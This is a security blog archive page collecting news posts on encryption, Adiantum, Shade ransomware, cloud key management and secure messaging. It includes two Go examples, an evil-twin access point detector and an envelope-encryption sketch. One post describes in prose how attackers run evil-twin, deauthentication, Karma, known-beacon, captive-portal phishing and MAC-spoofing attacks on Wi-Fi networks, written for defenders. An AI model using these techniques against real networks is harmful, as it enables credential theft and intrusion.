Category Archives: Encryption

Taking Care of Your Personal Online Security (For Paranoids)

By David Balaban

We live in a world where anonymity and online privacy are impossible things. Your phone calls can be tapped, smartphone data can be stolen, and even the camera and microphone can be turned on remotely. You can be watched from the satellite, in real time. We all live in the matrix and its special services […]

This is a post from HackRead.com. Read the original post: Taking Care of Your Personal Online Security (For Paranoids)

No One is Safe: the Five Most Popular Social Engineering Attacks Against Your Company’s Wi-Fi Network

Your Wi-Fi routers and access points all have strong WPA2 passwords, unique SSIDs, the latest firmware updates, and even MAC address filtering. Good job, networking and cybersecurity teams! However, is your network truly protected? TL;DR: NO!

In this post, I’ll cover the most common social engineering Wi-Fi association techniques that target your employees and other network users. Some of them are very easy to launch, and if your users aren’t aware of them and don’t know how to avoid them, it’s only a matter of time until your network is breached.

Attackers only need a Unix computer (which can be as inexpensive and low-powered as a $30 Raspberry Pi), a Wi-Fi adapter with monitor mode enabled, and a 3G modem for remote control. They can also buy ready-made stations with all of the necessary tools and user interface, but where’s the fun in that? 

Figure 1: Wi-Fi hacking tools

1. Evil Twin AP

An effortless and easy technique. All attackers need to do is set up an open AP (Access Point) with the same or a similar SSID (name) as the target and wait for someone to connect. Place it where the legitimate AP’s signal is weak and it’s only a matter of time until some employee connects, especially in big organizations. Alternatively, impatient attackers may follow the next technique.

Figure 2: Evil Twin Demonstration

2. Deauthentication / Disassociation Attack

In the current IEEE 802.11 (Wi-Fi) standards, whenever a wireless station wants to leave the network, it sends a deauthentication or disassociation frame to the AP. These two management frames are sent unencrypted and are not authenticated, which means anyone can spoof them.

This technique also makes it very easy to capture the WPA 4-way handshake needed for a brute-force attack on the passphrase, since a single deauthentication packet is enough to force a client to reconnect.

Even more importantly, attackers can spoof these frames repeatedly and thus cut off communication between Wi-Fi clients and the target AP, which increases the chance that your users will connect to the attacker’s twin AP. Combining these two techniques works very well, but it still depends on the user connecting to the fake AP. The following technique does not.

3. Karma Attack

Whenever a user device’s Wi-Fi is turned on but not connected to a network, it openly broadcasts the SSIDs of previously-associated networks in an attempt to connect to one of them. These small packets, called probe requests, are publicly viewable by anyone in the area.

The information gathered from probe requests can be combined with geo-tagged wireless network databases such as Wigle.net to map the physical location of these networks.

If one of the probe requests contains the SSID of an open Wi-Fi network, an attacker only has to bring up an open AP with that SSID, and the user’s laptop, phone or other device will connect to the fake AP automatically.

Forcing any connected device to send probe requests is very easy, thanks to the previous technique.

Figure 3: Sniffing Probe Requests

4. Known Beacons

The final attack I’ll discuss that can lead your user to connect to an attacker’s fake AP is “Known Beacons.” This is a scattershot technique in which attackers broadcast dozens of beacon frames for common SSIDs that nearby wireless users have likely connected to in the past (AndroidAP, Linksys, iPhone, etc.). Again, your users’ devices will automatically authenticate and connect thanks to the “Auto-Connect” feature.

An attacker has connected with your user, now what?

Once attackers have access to your user, there’s a variety of things they can do: sniff the victim’s traffic, steal login credentials, inject packets, port scan and exploit the user’s device, and so on. Most importantly, the attacker can also obtain the target AP’s password through a web phishing attack customized for the victim.

Since the victim is using the attacker’s machine as a router, there are many ways to make the phishing page look convincing. One of them is a captive portal. For example, by hijacking DNS, the attacker can redirect all web requests to a local web server, so that the phishing page appears no matter which site the victim tries to visit. Even worse, most operating systems will identify that page as a legitimate captive portal and open it automatically!

Figure 4: Captive Portal Attack

5. Bypassing MAC Address Filtering

As mentioned, your networks may use MAC Filtering, which means only predefined devices can connect to your network and having the password is not enough. How much does that help?

MAC addresses are hard-coded into the network card and cannot be changed there. However, the address the operating system presents on the network can be changed in software, so pretending to be one of the allowed devices is easy.

Attackers can easily obtain the MAC address of one of your network’s allowed devices, since every frame sent to and from your employee’s device carries its MAC address unencrypted. Of course, attackers have to force your employee’s device to disconnect (using deauthentication packets) before connecting to your network with the spoofed MAC address.

How Can You Mitigate?

Detecting an Evil AP in your area can be done easily by scanning and comparing configurations of nearby access points. However, as with any social engineering attack, the best way to mitigate is by training your users, which is a critical element of security.
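One way to do that comparison, as an added example that is not from the original post: a Go program that parses the text printed by the Linux iw scan command and flags any access point that advertises one of your managed SSIDs from a BSSID not in your inventory, serves a managed SSID without WPA2/WPA3, or broadcasts a lookalike name. The scan text, the inventory, the BSSIDs and the function names are all constructed for the example.

```go
package main

import (
	"bufio"
	"fmt"
	"strings"
)

// ScannedAP is one BSS entry recovered from "iw dev <iface> scan" output.
type ScannedAP struct {
	BSSID, SSID, Signal string
	Security            string // "open" or "RSN" (WPA2/WPA3)
}

// ParseIWScan pulls BSSID, SSID, signal and security out of iw's text output.
func ParseIWScan(out string) []ScannedAP {
	var aps []ScannedAP
	sc := bufio.NewScanner(strings.NewReader(out))
	for sc.Scan() {
		line := sc.Text()
		t := strings.TrimSpace(line)
		switch {
		case strings.HasPrefix(line, "BSS "): // "BSS aa:bb:cc:dd:ee:ff(on wlan0)"
			bss := strings.TrimPrefix(line, "BSS ")
			if i := strings.Index(bss, "("); i >= 0 {
				bss = bss[:i]
			}
			aps = append(aps, ScannedAP{BSSID: strings.ToLower(bss), Security: "open"})
		case len(aps) == 0: // field lines before the first BSS header
		case strings.HasPrefix(t, "SSID: "):
			aps[len(aps)-1].SSID = strings.TrimPrefix(t, "SSID: ")
		case strings.HasPrefix(t, "signal: "):
			aps[len(aps)-1].Signal = strings.TrimPrefix(t, "signal: ")
		case strings.HasPrefix(t, "RSN:"):
			aps[len(aps)-1].Security = "RSN"
		}
	}
	return aps
}

// ManagedNetwork is one corporate SSID with the BSSIDs allowed to serve it.
type ManagedNetwork struct {
	SSID   string
	BSSIDs map[string]bool
}

// normalize folds case and drops separators so "Corp-Net", "corp net" and
// "CorpNet" collide: the "same or similar SSID" an evil twin relies on.
func normalize(ssid string) string {
	var b strings.Builder
	for _, r := range strings.ToLower(ssid) {
		if (r >= 'a' && r <= 'z') || (r >= '0' && r <= '9') {
			b.WriteRune(r)
		}
	}
	return b.String()
}

// Finding is one suspicious AP and the reason it was flagged.
type Finding struct {
	AP     ScannedAP
	Reason string
}

// CheckScan flags any BSS that advertises a managed SSID from an unknown
// BSSID, serves a managed SSID without RSN, or uses a lookalike SSID.
func CheckScan(aps []ScannedAP, managed []ManagedNetwork) []Finding {
	var out []Finding
	for _, ap := range aps {
		for _, m := range managed {
			switch {
			case ap.SSID == m.SSID && !m.BSSIDs[ap.BSSID]:
				out = append(out, Finding{ap, "managed SSID from unknown BSSID (possible evil twin)"})
			case ap.SSID == m.SSID && ap.Security != "RSN":
				out = append(out, Finding{ap, "managed SSID served without WPA2/WPA3"})
			case ap.SSID != m.SSID && normalize(ap.SSID) == normalize(m.SSID):
				out = append(out, Finding{ap, "lookalike of managed SSID " + m.SSID})
			}
		}
	}
	return out
}

// sampleScan is a constructed, abbreviated scan in the layout iw prints:
// our real AP, an open evil twin and a lookalike SSID.
const sampleScan = `BSS aa:bb:cc:00:00:01(on wlan0)
	signal: -48.00 dBm
	SSID: CorpNet
	RSN:	 * Version: 1
BSS de:ad:be:ef:00:01(on wlan0)
	signal: -61.00 dBm
	SSID: CorpNet
BSS de:ad:be:ef:00:02(on wlan0)
	signal: -70.00 dBm
	SSID: Corp-Net
	RSN:	 * Version: 1
`

var inventory = []ManagedNetwork{{SSID: "CorpNet", BSSIDs: map[string]bool{"aa:bb:cc:00:00:01": true}}} // constructed

func main() {
	for _, f := range CheckScan(ParseIWScan(sampleScan), inventory) {
		fmt.Printf("%s %-10q %s %-4s %s\n", f.AP.BSSID, f.AP.SSID, f.AP.Signal, f.AP.Security, f.Reason)
	}
}
```

Run it periodically from a host near your APs and alert on any finding; it catches twins and lookalikes of your own SSIDs, not every rogue AP in range.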

Make sure your network users understand the risk of connecting to open access points and are well aware of the techniques mentioned. Running simulations of the above attacks is also recommended.

Finally, while specific techniques will come and go, social engineering will always remain a popular strategy for attackers. So make sure you and your users remain aware!

The post No One is Safe: the Five Most Popular Social Engineering Attacks Against Your Company’s Wi-Fi Network appeared first on Blog.

Threat Actors Impersonate Oil and Gas Companies in Latest Shade Ransomware Attack

Digital criminals tried to impersonate oil and gas companies in a recent attack campaign distributing Shade ransomware.

Between January and February, Yoroi observed an attack campaign leveraging email as an infection vector. Each of the emails came with an attached ZIP file called slavneft.zakaz.zip. The name of this file means “Slavneft order” in English, which includes a direct reference to the Russian oil and gas company PAO NGK Slavneft. Building on this disguise, the ZIP file contained a JavaScript file named «ПАО «НГК «Славнефть» подробности заказа, which translates to “PAO NGK Slavneft order details” in English.

Clicking on the JavaScript file activated a downloader that pulled Shade from one of several compromised websites. At that point, the ransomware payload, which had a VirusTotal detection rate of just 24 out of 69 engines at the time of discovery, encrypted all of the infected machine’s files using the Advanced Encryption Standard (AES). It then created a ransom note instructing victims to visit a dark web site to receive payment instructions from the attackers.

A Busy 2019 for Shade

Yoroi isn’t the only digital defense company that recently detected a new Shade ransomware campaign. In January 2019, ESET witnessed a large uptick in emails containing malicious JavaScript attachments, including those responsible for downloading Shade. In February, Carbon Black observed a similar campaign also leveraging JavaScript attachments to target primarily Russian speakers.

These attacks come at a time when targeted ransomware remains one of the most prominent threats targeting organizations. Europol said as much in 2018 after it observed threat actors turning to targeted ransomware, not banking Trojans, as their preferred payload in financially motivated cyberattacks. This preference contributed to Cybersecurity Ventures’ estimate that ransomware damages would surpass $8 billion by the end of 2018.

How to Protect Against Shade Ransomware

Security professionals can help defend their organizations against Shade ransomware and similar malware by making sure their endpoint software is up-to-date and all applications are updated to their most secure versions. Organizations should also make sure to isolate their data backup systems so that attackers can’t encrypt these copies in the event of a successful ransomware infection.

The post Threat Actors Impersonate Oil and Gas Companies in Latest Shade Ransomware Attack appeared first on Security Intelligence.

Severe flaws in password managers let hackers extract clear-text passwords

By Waqas

Password Managers aren’t as secure as you might assume – Security researchers claim that hackers can steal master passwords in PC memory. Password managers are considered as one of the most suitable options when it comes to keeping your online credentials safe from being hijacked and exploited by cybercriminals. However, unfortunately, the latest research findings […]

This is a post from HackRead.com. Read the original post: Severe flaws in password managers let hackers extract clear-text passwords

Lessons from the Encryption Front Line: Core Components in the Cloud

This is the second installment in a multipart series about data encryption. Be sure to read part one for the full story.

Now that we understand the common threats facing organizations and how to select the right solution for data-at-rest encryption (DaRE), what’s the next step in your data encryption journey?

Encrypting data is the relatively easy part of the solution, but securely managing keys is a major challenge. According to the National Institute of Standards and Technology (NIST), “Keys are analogous to the combination of a safe. If an adversary knows the combination, the strongest safe provides no security against penetration. Similarly, poor key management may easily compromise strong algorithms.”

DaRE needs more than software to encrypt data, because the keys still need to be managed. Let’s dive deeper into the key management challenge, the core components needed to manage keys effectively and the open standards security teams should use in their cloud environments.

The Encryption Key Management Challenge

In DaRE solutions, symmetric encryption is used for speed: the same key encrypts and decrypts the data, so the security of the system relies on that key being kept secret. Most organizations now encrypt laptop disks, but there decryption starts only after a password is entered manually, which is impractical in cloud environments with thousands of servers.

If the data is being decrypted after a system has started, the encryption software can use a secret key stored locally on the server, which will be in an obscured format that can be decoded. The risk here is that a privileged insider or threat actor could potentially decode the key and decrypt the data. Therefore, security teams need a way to protect their encryption keys.

Unscrambling the Encryption Solution Components

A typical cloud encryption solution has three core components: an encryption client, a key management server (KMS) and a hardware security module (HSM).

The encryption client performs the actual encryption using a data encryption key (DEK). Because the DEK must itself be stored in encrypted form, it is wrapped with a key encryption key (KEK).

The KEK is obtained from a KMS, which contains many hundreds or thousands of keys in a database. Once again, the KEKs need to be encrypted using a master encryption key (MEK) because there is a risk that the KMS could be compromised. The MEK is stored in the HSM, which enables the security team to store a key in hardware that physically prevents tampering or loss of the MEK.
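The three-tier hierarchy above, as an added example (not code from the article or from any vendor’s product): a Go program in which an HSM stand-in wraps KEKs under a MEK it never exports, a KMS stand-in stores only the wrapped KEKs, and the encryption client does envelope encryption with AES-256-GCM from Go’s standard library. The type and function names, the key IDs and the choice of GCM are assumptions; a real deployment would talk to the HSM over PKCS#11 and to the KMS over KMIP rather than calling methods in one process.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"errors"
)

// random returns n bytes from crypto/rand (used for keys and nonces).
func random(n int) []byte {
	b := make([]byte, n)
	if _, err := rand.Read(b); err != nil {
		panic(err)
	}
	return b
}

// aead returns AES-256-GCM for key; aes.NewCipher only fails on a bad key length.
func aead(key []byte) cipher.AEAD {
	block, err := aes.NewCipher(key)
	if err != nil {
		panic(err)
	}
	gcm, _ := cipher.NewGCM(block) // cannot fail for an AES block
	return gcm
}

// seal encrypts pt with a random nonce prefixed; aad is authenticated, not
// encrypted, and is used below to bind every wrapped key to its key ID.
func seal(key, pt, aad []byte) []byte {
	gcm := aead(key)
	nonce := random(gcm.NonceSize())
	return gcm.Seal(nonce, nonce, pt, aad)
}

// open reverses seal; a wrong key, wrong aad or any tampering is an error.
func open(key, sealed, aad []byte) ([]byte, error) {
	gcm := aead(key)
	if n := gcm.NonceSize(); len(sealed) >= n {
		return gcm.Open(nil, sealed[:n], sealed[n:], aad)
	}
	return nil, errors.New("ciphertext too short")
}

// HSM holds the MEK and never exports it; like a PKCS#11 device it only
// wraps and unwraps KEKs on the KMS's behalf.
type HSM struct{ mek []byte }

func NewHSM() *HSM                                           { return &HSM{mek: random(32)} }
func (h *HSM) wrap(id string, kek []byte) []byte             { return seal(h.mek, kek, []byte(id)) }
func (h *HSM) unwrap(id string, blob []byte) ([]byte, error) { return open(h.mek, blob, []byte(id)) }

// KMS stores KEKs only in MEK-wrapped form, so a stolen copy of db is
// useless without the HSM. GetKEK is the request a client makes over KMIP.
type KMS struct {
	hsm *HSM
	db  map[string][]byte // kekID -> wrapped KEK
}

func NewKMS(h *HSM) *KMS           { return &KMS{hsm: h, db: map[string][]byte{}} }
func (k *KMS) CreateKEK(id string) { k.db[id] = k.hsm.wrap(id, random(32)) }

func (k *KMS) GetKEK(id string) ([]byte, error) {
	wrapped, ok := k.db[id]
	if !ok {
		return nil, errors.New("unknown or destroyed KEK " + id)
	}
	return k.hsm.unwrap(id, wrapped)
}

// DestroyKEK: every DEK wrapped under this KEK, and so all data under those
// DEKs, becomes unrecoverable (crypto-shredding).
func (k *KMS) DestroyKEK(id string) { delete(k.db, id) }

// Envelope is what the client stores beside the data: ciphertext plus the
// DEK wrapped under the named KEK. No plaintext key is ever written to disk.
type Envelope struct {
	KEKID      string
	WrappedDEK []byte
	Ciphertext []byte
}

// Encrypt is the client side: a fresh DEK per object, data under the DEK,
// the DEK under the KEK fetched from the KMS.
func Encrypt(kms *KMS, kekID string, data []byte) (*Envelope, error) {
	kek, err := kms.GetKEK(kekID)
	if err != nil {
		return nil, err
	}
	dek := random(32)
	return &Envelope{kekID, seal(kek, dek, []byte(kekID)), seal(dek, data, nil)}, nil
}

// Decrypt unwraps the DEK with the KEK from the KMS, then opens the data.
func Decrypt(kms *KMS, e *Envelope) ([]byte, error) {
	kek, err := kms.GetKEK(e.KEKID)
	if err != nil {
		return nil, err
	}
	dek, err := open(kek, e.WrappedDEK, []byte(e.KEKID))
	if err != nil {
		return nil, err
	}
	return open(dek, e.Ciphertext, nil)
}
```

Because only the small wrapped DEK depends on the KEK, rotating a KEK means re-wrapping DEKs rather than re-encrypting data, and destroying a KEK renders every envelope under it unrecoverable.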

Creating an Open Encryption Solution

In the past, encryption solutions have been built around proprietary protocols, making integration difficult. That’s why OASIS defined a set of standards to improve interoperability between encryption and key management solutions from different vendors.

Over the past few years, vendors have increasingly adopted standard protocols for communication between the KMS and HSM, such as OASIS PKCS#11, as well as for communication between the encryption client and the KMS, such as the OASIS KMIP protocol. Look for solutions that use these standards when putting together your encryption strategy.

Encryption Solutions Are Maturing

With a standard set of components that support open standards, encryption technology is gradually maturing to make implementation and encryption key management easier. In cloud environments, these components are often available in a lower-cost implementation known as bring-your-own-key (BYOK), which integrates with supported DaRE solutions. These solutions are now reaching high levels of assurance with HSMs offering FIPS 140-2 Level 4 in the cloud.

Depending on your needs, you can develop encryption solutions based on open standards from components you build and run yourself or source them as managed services from cloud providers.

The post Lessons from the Encryption Front Line: Core Components in the Cloud appeared first on Security Intelligence.

Podcast Episode 133: Quantum Computing’s Security Challenge and Life After Passwords

The arrival of functional quantum computers may be closer than you think. I'm joined by Avesta Hojjati, Head of DigiCert Labs, and Brian LaMacchia, Distinguished Engineer and Head of the Security and Cryptography Group at Microsoft Research, to talk about the coming quantum revolution and what it means for security.



Bleichenbacher Oracle Attack Variation Subjects TLS Encryption To Further Vulnerabilities

Encryption is one of the safest forms of securing data; yet academics recently found a vulnerability that allowed attackers to

Bleichenbacher Oracle Attack Variation Subjects TLS Encryption To Further Vulnerabilities on Latest Hacking News.

Adiantum will bring encryption on Android devices without cryptographic acceleration

Google announced Adiantum, a new encryption method devised to protect Android devices without cryptographic acceleration.


“Adiantum is an innovation in cryptography designed to make storage encryption more efficient for devices without cryptographic acceleration, to ensure that all devices can be encrypted.” reads the announcement published by Google.

Since Android version 6.0, user data has been protected with Advanced Encryption Standard (AES) encryption; however, the feature is slow on mobile devices with low-end processors that lack hardware support for it.

The new encryption form has been created for devices running Android 9 and higher that don’t support AES CPU instructions.

For this reason, Google developed Adiantum, which uses the ChaCha stream cipher in a length-preserving mode. ChaCha offers good security and performance in the absence of dedicated hardware acceleration.

Google experts pointed out that Adiantum encryption/decryption processes on ARM Cortex-A7 processors are around five times faster compared to AES-256-XTS.

Adiantum performance

“Unlike modes such as XTS or CBC-ESSIV, Adiantum is a true wide-block mode: changing any bit anywhere in the plaintext will unrecognizably change all of the ciphertext, and vice versa. It works by first hashing almost the entire plaintext,” continues Google.

“We also hash a value called the “tweak” which is used to ensure that different sectors are encrypted differently. This hash is then used to generate a nonce for the ChaCha encryption. After encryption, we hash again, so that we have the same strength in the decryption direction as the encryption direction.”

Adiantum could represent the optimal solution for a wide range of devices that haven’t dedicated hardware for encryption, such as smartwatches, smart TVs, and other IoT devices running on Android OS.

“Our hope is that Adiantum will democratize encryption for all devices. Just like you wouldn’t buy a phone without text messaging, there will be no excuse for compromising security for the sake of device performance,” wrote Eugene Liderman, Director of Mobile Security Strategy, Android Security & Privacy Team.

“Everyone should have privacy and security, regardless of their phone’s price tag.”

Google published technical details about the new encryption form in the paper titled “Adiantum: length-preserving encryption for entry-level processors.”

Pierluigi Paganini

(SecurityAffairs – Android, encryption)

The post Adiantum will bring encryption on Android devices without cryptographic acceleration appeared first on Security Affairs.

Compromising vital infrastructure: communication

Have you ever been witness to a Wi-Fi failure in a household with school-aged children? If so, I don’t have to convince you that communication qualifies as vital infrastructure. For the doubters: when you see people risking their lives in traffic just to check their phone, you’ll understand why most adults consider instant communication to be vital as well.

Forms of communication

Humanity has come a long way in communication techniques. From drawings on the cave wall to wartime messages sent via courier to the Pony Express and now, the Internet. Modern communication tools enable us to reach most places across the world in a matter of seconds.

What are the lines of communications that are more or less vital to our everyday life?

  • The Internet
  • Telephone lines
  • Mobile telephone networks
  • TV and radio broadcasting

Granted, if one of these communication forms fails, part of its traffic can be taken over by another form, but they all have their specific pros and cons that make a prolonged outage hard to cope with. For example, most smartphones are capable of using both the mobile networks and the Internet, but the latter is limited to when they have Wi-Fi access. When cell phone towers went down, as they did during 9/11, users could still send messages via Internet messaging services—at that time, AIM, but today WhatsApp, Facebook Messenger, or other platforms.

Growing importance

In the list I posted earlier, you may have felt that I missed out on letters and postcards, or snail-mail as we often call it. This is because a growing number of companies are keeping us informed through email, their websites, text messages, and other forms of communication that are way faster than postal services. Most companies will still send letters and paper bills if you ask for them, but it’s no longer the default. Our mail delivery services are increasingly starting to resemble package delivery services. They see a growing number of deliveries that require a physical transfer of an object rather than information alone.

Instead, the majority of modern communication is digital.

Securing digital communication

Digital information that needs to be kept from prying eyes and eavesdropping is usually encrypted. To establish secure communication, one may use encrypted mail, crypto-phones, and secure protocols on the Internet. Most of these encryptions are strong enough to withstand brute force attempts at entry—at least for long enough to outlive the usefulness of intercepting the message. Future computer systems like qubit quantum computers, however, may require us to upgrade the encryption strength that we use for these methods.

Breaking the Internet

Because of the way the Internet has grown and become more versatile, the Internet backbone is robust enough to withstand DDoS attacks of a large magnitude. Yet, there have been instances where an entire country, such as North Korea, was taken offline, or where an attack on a major DNS provider caused a serious disruption in the number of sites we were able to visit.

These attacks were targeted at systems that were important for specific parts of the Internet. Nevertheless, they demonstrated that there are weaknesses in the infrastructure that can be exploited to paralyze parts of the Internet, and therefore, parts of our vital communication.

Misinformation and fake news

Another growing problem with predominantly online communication is the spreading of fake news and deliberate misinformation. The most common reasons for spreading misinformation are political and financial gain, as well as attention. The problem has reached a size and impact that caused government bodies like the EU to announce countermeasures. During that process, and due to other influences social media has over its users, many organizations felt the need to hire hordes of moderators who are tasked with keeping the information spread on their platforms as clean and as honest as possible. This still fell short in some instances, such as the dramatic events in Myanmar where Facebook was used as a tool for ethnic cleansing. And these are not the only problems social media are trying to deal with.

propaganda or truth

Malware and communication

Communication is also a vital part of some types of malware, such as backdoors, Trojans, and especially spyware. After all, what use is it to spy on someone if you are unable to get your hands on the gathered information? Traditional malware communication relies on the use of Command and Control (C&C) servers. But since those servers can be taken down or blocked, malware authors have been looking at rotation systems like Domain Generating Algorithms and some other creative ideas, like using social media and other public platforms.

While you may use social media to stay in contact with family and friends, there are many forms of malware that use those same media for different purposes. Botnets are known to use Twitter as an outlet for spam, fraud, and fake news. But they also use it to send commands to Remote Access Trojans (RATs) that wait for code hidden in memes posted by a particular account.

In addition, malware exploits messenger platforms to communicate instructions. There’s the Goodsender malware, for which threat actors used the Telegram messenger platform to communicate with the malware and send HTTPS-protected instructions. Another well-known phenomenon is the Facebook Messenger apps that spread in a worm-like fashion by sending links to friends in an attempt to trick them into installing the app.

Social media countermeasures

While social media is struggling with its public reputation these days, they at least seem ready to take baby steps forward in tightening up security—whether that’s from political pressure or self-awareness. At an event in Brussels, Nick Clegg, Facebook’s head of global public relations, stated:

We are at the start of a discussion which is no longer about whether social media should be regulated, but how it should be regulated. We recognize the value of regulation, and we are committed to working with policymakers to get it right.

Working out the “how” could turn into a long-winded discussion, however. Maybe the rumors about a space laser communications system represent a step in the right direction. In theory, such a system could be used to improve security.

Better communication results in better security

Having all the facts helps us to improve security. Making sure that this information reaches the people that need it is a matter of effective communication strategy. And in some cases, it may be just as important that the information is not communicated so that it doesn’t fall into the wrong hands.

The National Intelligence Strategy released in January 2019 by the Office of the Director of National Intelligence states:

Nearly all information, communication networks, and systems will be at risk for years to come.

Therefore, an important part of communication strategy must be to recognize the risk and integrate the proper tools—such as end-to-end encryption or intel on certain platforms known to be used by cybercriminals, for example. The National Intelligence Strategy goes on to say that they’ll be “harnessing the full talent and tools of the IC [Intelligence Community] by bringing the right information, to the right people, at the right time.”

Cyberattacks on communication infrastructure

A pretty bizarre method of abusing communication happened when a family was scared into believing there was an ongoing nuclear attack, as some prankster accessed their Nest camera to issue realistic warnings about missiles heading to the US from North Korea.

More worrying is the trend for ransomware authors (especially groups using SamSam) to aim their targets at cities and small government bodies with the aim of shutting down infrastructure, including communications. Taking down a city website, as was the case in the city of Atlanta, cripples an important medium of disseminating citizen information, not to mention that the costs related to getting everything back online were absorbed with taxpayer money that could have been better spent on other services.

Information is crucial

Important decisions may be postponed when the person or body that is supposed to make that decision is unable to gather the information necessary. Communications are also a vital part of some malware infections. Perhaps organizations can use some of the ingenious methods malware authors have thought up when looking for ways to make vital lines of communication more robust. Redundancy is a good thing when it allows us to use multiple methods and networks to transmit the same information. On the other hand, it also enlarges the attack surface when it comes to sharing confidential information.

This does have an upside for the quality of free information. Because of all the communication options out there, some regimes are having an increasingly difficult time shielding their population from information they would rather keep under the carpet. This hasn’t stopped some, like China’s Great Firewall, from trying, though.

Communication is everywhere

Communication is truly always available to nearly everyone that wants it in the western world, and this readiness—and the danger that lurks with it—may shape how our generation is viewed far into the future. This may be the era when communication both flourished to its true potential, and reached its limits. After all, pitfalls are inherent when technology develops faster than regulation can keep up.

Maybe the developments we are seeing now are just another step forward for the eventual better regulation of communication, though I’m convinced it will not be the last step regulators need to take. In fact, 5G is already waiting around the corner to add another level in speed and bandwidth to an already connected society. Let’s see how this new technology impacts an already complex tapestry of communication triumphs and failures.

The post Compromising vital infrastructure: communication appeared first on Malwarebytes Labs.

Adiantum: A new encryption scheme for low-end Android devices

Google has created an alternative disk and file encryption mode for low-end Android devices that don’t have enough computation power to use the Advanced Encryption Standard (AES). About Adiantum For the new encryption scheme, dubbed Adiantum, Google used existing standards, ciphers and hashing functions, but combined them in a more efficient way. Paul Crowley and Eric Biggers from the Android Security & Privacy Team noted that they have high confidence in the security of the … More

The post Adiantum: A new encryption scheme for low-end Android devices appeared first on Help Net Security.

Google Created Faster Storage Encryption for All Low-End Devices

Google has launched a new encryption algorithm that has been built specifically to run on mobile phones and smart IoT devices that don't have the specialized hardware to use current encryption methods to encrypt locally stored data efficiently. Encryption has already become an integral part of our everyday digital activities. However, it has long been known that encryption is expensive, as

Merging Facebook Messenger, WhatsApp, and Instagram: a technical, reputational hurdle

Secure messaging is supposed to be just that—secure. That means no backdoors, strong encryption, private messages staying private, and, for some users, the ability to securely communicate without giving up tons of personal data.

So, when news broke that scandal-ridden, online privacy pariah Facebook would expand secure messaging across its Messenger, WhatsApp, and Instagram apps, a broad community of cryptographers, lawmakers, and users asked: Wait, what?

Not only is the technology difficult to implement, the company implementing it has a poor track record with both user privacy and online security.

On January 25, the New York Times reported that Facebook CEO Mark Zuckerberg had begun plans to integrate the company’s three messaging platforms into one service, allowing users to potentially communicate with one another across its separate mobile apps. According to the New York Times, Zuckerberg “ordered that the apps all incorporate end-to-end encryption.”

The initial response was harsh.

Abroad, Ireland’s Data Protection Commission, which regulates Facebook in the European Union, immediately asked for an “urgent briefing” from the company, warning that previous data-sharing proposals raised “significant data protection concerns.”

In the United States, Democratic Senator Ed Markey for Massachusetts said in a statement: “We cannot allow platform integration to become privacy disintegration.”

Cybersecurity technologists swayed between cautious optimism and just plain caution.

Some professionals focused on the clear benefits of enabling end-to-end encryption across Facebook’s messaging platforms, emphasizing that any end-to-end encryption is better than none.

Former Facebook software engineer Alec Muffett, who led the team that added end-to-end encryption to Facebook Messenger, said on Twitter that the integration plan “clearly maximises the privacy afforded to the greatest [number] of people and is a good idea.”

Others questioned Facebook’s motives and reputation, scrutinizing the company’s established business model of hoovering up mass quantities of user data to deliver targeted ads.

Johns Hopkins University Associate Professor and cryptographer Matthew Green said on Twitter that “this move could potentially be good or bad for security/privacy. But given recent history and financial motivations of Facebook, I wouldn’t bet my lunch money on ‘good.’”

On January 30, Zuckerberg confirmed the integration plan during a quarterly earnings call. The company hopes to complete the project either this year or in early 2020.

It’s going to be an uphill battle.

Three applications, one bad reputation

Merging three separate messaging apps is easier said than done.

In a phone interview, Green said Facebook’s immediate technological hurdle will be integrating “three different systems—one that doesn’t have any end-to-end encryption, one where it’s default, and one with an optional feature.”

Currently, the messaging services across WhatsApp, Facebook Messenger, and Instagram have varying degrees of end-to-end encryption. WhatsApp provides default end-to-end encryption, whereas Facebook Messenger provides optional end-to-end encryption if users turn on “Secret Conversations.” Instagram provides no end-to-end encryption in its messaging service.

Further, Facebook Messenger, WhatsApp, and Instagram all have separate features—like Facebook Messenger’s ability to support more than one device and WhatsApp’s support for group conversations—along with separate desktop or web clients.

Green said to imagine someone using Facebook Messenger’s web client—which doesn’t currently support end-to-end encryption—starting a conversation with a WhatsApp user, where encryption is set by default. These lapses in default encryption, Green said, could create vulnerabilities. The challenge is in pulling together all those systems with all those variables.

“First, Facebook will have to likely make one platform, then move all those different systems into one somewhat compatible system, which, as far as I can tell, would include centralizing key servers, using the same protocol, and a bunch of technical development that has to happen,” Green said. “It’s not impossible. Just hard.”

But there’s more to Facebook’s success than the technical know-how of its engineers. There’s also its reputation, which, as of late, portrays the company as a modern-day data baron, faceplanting into privacy failure after privacy failure.

After the 2016 US presidential election, Facebook refused to call the surreptitious collection of 50 million users’ personal information a “breach.” When brought before Congress to testify about his company’s role in a potential international disinformation campaign, Zuckerberg deflected difficult questions and repeatedly claimed the company does not “sell” user data to advertisers. But less than one year later, a British parliamentary committee released documents that showed how Facebook gave some companies, including Airbnb and Netflix, access to its platform in exchange for favors—no selling required.

Five months ago, Facebook’s Onavo app was booted from the Apple App Store for gathering app data, and early this year, Facebook reportedly paid users as young as 13-years-old to install the “Facebook Research” app on their own devices, an app intended strictly for Facebook employee use. Facebook pulled the app, but Apple had extra repercussions in mind: It removed Facebook’s enterprise certificate, which the company relied on to run its internal developer apps.

These repeated privacy failures are enough for some users to avoid Facebook’s end-to-end encryption experiment entirely.

“If you don’t trust Facebook, the place to worry is not about them screwing up the encryption,” Green said. “They want to know who’s talking to who and when. Encryption doesn’t protect that at all.”

If not Facebook, then who?

Reputationally, there are at least two companies that users look to for both strong end-to-end encryption and strong support of user privacy and security—Apple and Signal, which respectively run the iMessage and Signal Messenger apps.

In 2013, Open Whisper Systems developed the Signal Protocol. This encryption protocol provides end-to-end encryption for voice calls, video calls, and instant messaging, and is implemented by WhatsApp, Facebook Messenger, Google’s Allo, and Microsoft’s Skype to varying degrees. Journalists, privacy advocates, cryptographers, and cybersecurity researchers routinely praise Signal Messenger, the Signal Protocol, and Open Whisper Systems.

“Use anything by Open Whisper Systems,” said former NSA defense contractor and government whistleblower Edward Snowden.

“[Signal is] my first choice for an encrypted conversation,” said cybersecurity researcher and digital privacy advocate Bruce Schneier.

Separately, Apple has proved its commitment to user privacy and security through statements made by company executives, updates pushed to fix vulnerabilities, and legal action taken in US courts.

In 2016, Apple fought back against a government request that the company design an operating system capable of allowing the FBI to crack an individual iPhone. Such an exploit, Apple argued, would be too dangerous to create. Earlier last year, when an American startup began selling iPhone-cracking devices—called GrayKey—Apple fixed the vulnerability through an iOS update.

